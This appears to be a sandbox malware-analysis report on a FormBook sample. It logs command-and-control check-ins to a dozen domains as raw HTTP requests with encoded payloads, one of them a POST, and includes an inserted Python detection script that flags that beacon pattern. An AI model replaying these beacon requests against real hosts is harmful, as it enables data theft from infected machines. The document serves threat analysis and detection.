Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52131 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52131 -> 13.248.169.48:80
Source: Joe Sandbox View | IP Address: 172.191.244.62
Source: Joe Sandbox View | IP Address: 63.250.47.40
Source: Joe Sandbox View | ASN Name: ATT-INTERNET4US
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: HOSTNETNL
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile | 0_2_004422FE
Source: global traffic | HTTP traffic detected:
  GET /2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.elsupertodo.net
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
  GET /7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.omexai.info
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
  GET /fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.tekilla.wtf
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
  GET /3qit/?7lpPGx=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&QF4tL=lBP8AZrpnb HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.bola88site.one
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
  GET /nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.languagemodel.pro
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
  GET /3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnb HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.kexweb.top
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
  GET /ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy39 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.jobworklanka.online
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?7lpPGx=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL3dlYbix0Oof31N0WjWMIZqIkiGsjqX+LyUecOwrV8dky8MLclvmAsWX&QF4tL=lBP8AZrpnb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 219Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 37 6c 70 50 47 78 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 78 47 6b 63 2f 33 47 4a 66 50 6b 47 77 51 52 68 31 39 31 6b 6b 4f 6d 66 61 6f 45 5a 44 7a 59 30 53 62 6c 6a 2f 35 4b 72 57 6e 6f 73 68 51 2b 4f 41 3d 3d Data Ascii: 7lpPGx=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==
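The nine GET requests and the POST above share one shape: a single four-character directory, a query (or, for the POST, a form-urlencoded body) carrying a long base64-like value that differs every time plus a ten-character value, lBP8AZrpnb, that is identical on every host, the same IE8-on-Windows-XP User-Agent from a native Win32 sample, and Connection: close. The following is an added example, not part of the Joe Sandbox report: a small triage script that flags requests with that shape, pivots on the repeated token to list the hosts it reaches, and lists the names from the DNS rows that never exchanged HTTP. The request rows are copied from the report with the long query values shortened; the regexes, thresholds, the request() helper and the two benign control requests at the end of the list are this example's own assumptions.

```python
"""Triage of the HTTP beacons recorded above (added example, not report content).

Request rows are copied from the report (long second value shortened). The
heuristics, regexes and the two benign controls are this example's assumptions.
"""
import re

# The exact User-Agent on every request above: IE8 on Windows XP, sent by a
# native Win32 binary that embeds no browser. Match it exactly, not as a family.
FORMBOOK_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; "
               "GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; "
               ".NET CLR 3.5.30729)")

# Assumed structural heuristics, drawn from the rows above.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")           # one 4-char directory, e.g. /7xi5/
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{10}$")           # short value repeated across hosts
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # long base64-alphabet value


def request(method, host, target, body="", ua=FORMBOOK_UA):
    """Hypothetical request record; the fields a proxy or PCAP parser would give you."""
    return {"method": method, "host": host, "target": target, "body": body, "ua": ua}


def split_params(encoded):
    """Split 'k=v&k2=v2' WITHOUT URL-decoding: '+' and '/' are part of the blob."""
    pairs = []
    for part in encoded.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def classify(req):
    """Return (is_beacon, token, reasons). The verdict needs the path shape, the
    payload blob and the user-agent together; the user-agent alone is too common."""
    path, _, query = req["target"].partition("?")
    params = split_params(query if req["method"] == "GET" else req["body"])
    values = [v for _, v in params]
    token = next((v for v in values if TOKEN_RE.match(v)), None)
    blob = next((v for v in values if BLOB_RE.match(v)), None)
    reasons = []
    if PATH_RE.match(path):
        reasons.append("single 4-char directory")
    if blob is not None:
        reasons.append("base64-like payload parameter")
    if token is not None:
        reasons.append("10-char token parameter")
    if req["ua"] == FORMBOOK_UA:
        reasons.append("IE8/WinXP user-agent")
    is_beacon = (PATH_RE.match(path) is not None and blob is not None
                 and req["ua"] == FORMBOOK_UA)
    return is_beacon, token, reasons


def triage(requests):
    """Group beaconing hosts by the repeated token (the pivot across domains).
    Returns ({token: sorted hosts}, sorted list of every beaconing host)."""
    pivot, beacon_hosts = {}, set()
    for req in requests:
        is_beacon, token, _ = classify(req)
        if not is_beacon:
            continue
        beacon_hosts.add(req["host"])
        if token:
            pivot.setdefault(token, set()).add(req["host"])
    return {t: sorted(h) for t, h in pivot.items()}, sorted(beacon_hosts)


def dns_only(dns_queries, beacon_hosts):
    """Names the sample resolved but never exchanged HTTP with; block these too."""
    return sorted(set(dns_queries) - set(beacon_hosts))


SAMPLE_REQUESTS = [
    request("GET", "www.elsupertodo.net", "/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0V"),
    request("GET", "www.omexai.info", "/7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1f&QF4tL=lBP8AZrpnb"),
    request("GET", "www.tekilla.wtf", "/fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJks"),
    request("GET", "www.bola88site.one", "/3qit/?7lpPGx=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8&QF4tL=lBP8AZrpnb"),
    request("GET", "www.languagemodel.pro", "/nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIH"),
    request("GET", "www.kexweb.top", "/3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPa&QF4tL=lBP8AZrpnb"),
    request("GET", "www.jobworklanka.online", "/ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVS"),
    request("GET", "www.dyme.tech", "/h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgl&QF4tL=lBP8AZrpnb"),
    request("GET", "www.mizuquan.top", "/e0nr/?7lpPGx=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW&QF4tL=lBP8AZrpnb"),
    request("POST", "www.omexai.info", "/7xi5/",
            body="7lpPGx=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8V"),
    # Constructed controls: a normal browser request, and one that only shares the UA.
    request("GET", "www.example.com", "/index.html?utm_source=newsletter&id=abc",
            ua="Mozilla/5.0 (constructed browser UA)"),
    request("GET", "www.example.org", "/api/v1/status"),
]

# The names in the report's 'DNS query' rows, in order.
DNS_QUERIES = [
    "www.woshop.online", "www.kxshopmr.store", "www.elsupertodo.net", "www.omexai.info",
    "www.tekilla.wtf", "www.bola88site.one", "www.languagemodel.pro", "www.kexweb.top",
    "www.jobworklanka.online", "www.dyme.tech", "www.arlon-commerce.com", "www.mizuquan.top",
]

if __name__ == "__main__":
    pivot, hosts = triage(SAMPLE_REQUESTS)
    for token, reached in pivot.items():
        print(f"token {token} reached {len(reached)} hosts: {', '.join(reached)}")
    print("DNS-only names:", ", ".join(dns_only(DNS_QUERIES, hosts)))
```

The second control request shows why the verdict is not keyed on the User-Agent alone: plenty of legitimate software still sends that IE8 string. The fixed token is the better pivot, since it ties every host on the list to one campaign even though the encrypted parameter changes per request.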
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:30 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:32 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:35 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 25 Sep 2024 09:37:37 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 